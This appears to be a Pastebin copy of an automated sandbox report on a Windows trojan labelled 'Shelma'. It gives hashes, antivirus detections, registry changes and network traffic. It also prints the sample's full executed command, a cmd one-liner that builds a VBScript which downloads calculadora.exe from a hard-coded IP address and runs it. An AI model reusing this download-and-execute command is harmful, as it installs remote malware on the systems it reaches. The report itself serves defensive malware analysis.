Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Shelma"
- * MalScore: 10.0
- * File Name: "Exes_4a379d1c072bf1bff847220bd0d89c0d.exe"
- * File Size: 347648
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "f615a06894da64d72b714068a862a217345a8b224aa07a2d986440674c071e91"
- * MD5: "4a379d1c072bf1bff847220bd0d89c0d"
- * SHA1: "d1688f6fd219742dddf6ccd1ebe67aeffe868689"
- * SHA512: "1a5119b178f94ef14ab79e7992f78fa33ab4552bfeba0a81384097454dfa0de5e79e3a0106ba7b6dee9cbe7bb7e9e512a9dc9917b4f476f60613866ffeee6fb2"
- * CRC32: "6E8A71E2"
- * SSDEEP: "6144:T1fatoNBFgU1hvH99i2fQEmvGJy7rcjZPSfgy:T1famNR99vwG+rES/"
- * Process Execution:
- "Exes_4a379d1c072bf1bff847220bd0d89c0d.exe",
- "cmd.exe",
- "cscript.exe",
- "calculadora.exe"
- * Executed Commands:
- "cmd.exe /c \"@echo Set objXMLHTTP=CreateObject(\"MSXML2.XMLHTTP\")>poc.vbs &@echo objXMLHTTP.open \"GET\",\"http://69.64.43.224/calculadora.exe\",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject(\"ADODB.Stream\")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile \"calculadora.exe\">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject(\"WScript.Shell\")>>poc.vbs&@echo objShell.Exec(\"calculadora.exe\")>>poc.vbs&cscript.exe poc.vbs\"",
- "cscript.exe poc.vbs",
- "calculadora.exe"
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details":
- "IP": "69.64.43.224:80"
- "IP": "69.64.43.224:443"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details":
- "Window": "WSH-Timer"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x000000e8, length: 0x00000018"
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x000001e0, length: 0x00000078"
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x00015e00, length: 0x00000020"
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x00015e58, length: 0x00000018"
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x00015f50, length: 0x00000018"
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x00016110, length: 0x00000010"
- "self_read": "process: cscript.exe, pid: 2400, offset: 0x00016230, length: 0x00000012"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\calculadora.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://69.64.43.224/calculadora.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://69.64.43.224/calculadora.exe"
- "Description": "File has been identified by 11 Antiviruses on VirusTotal as malicious",
- "Details":
- "Kaspersky": "Trojan.Win32.Shelma.amoi"
- "Sophos": "Mal/Shellter-AC"
- "McAfee-GW-Edition": "RDN/Generic.dx"
- "Fortinet": "W32/Shelma.AC!tr"
- "ZoneAlarm": "Trojan.Win32.Shelma.amoi"
- "AhnLab-V3": "Malware/Gen.Generic.C3336226"
- "McAfee": "RDN/Generic.dx"
- "TrendMicro-HouseCall": "TROJ_GEN.R004H07GE19"
- "Tencent": "Win32.Trojan.Shelma.Pcst"
- "GData": "Win32.Trojan.Kryptik.TAYVZ7"
- "AVG": "FileRepMetagen Malware"
- * Started Service:
- * Mutexes:
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\ZonesCounterMutex",
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\poc.vbs",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\calculadora1.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\calculadora.exe"
- * Deleted Files:
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://69.64.43.224/calculadora.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "69.64.43.224",
- "version": "1.1",
- "path": "/calculadora.exe",
- "data": "GET /calculadora.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 69.64.43.224\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment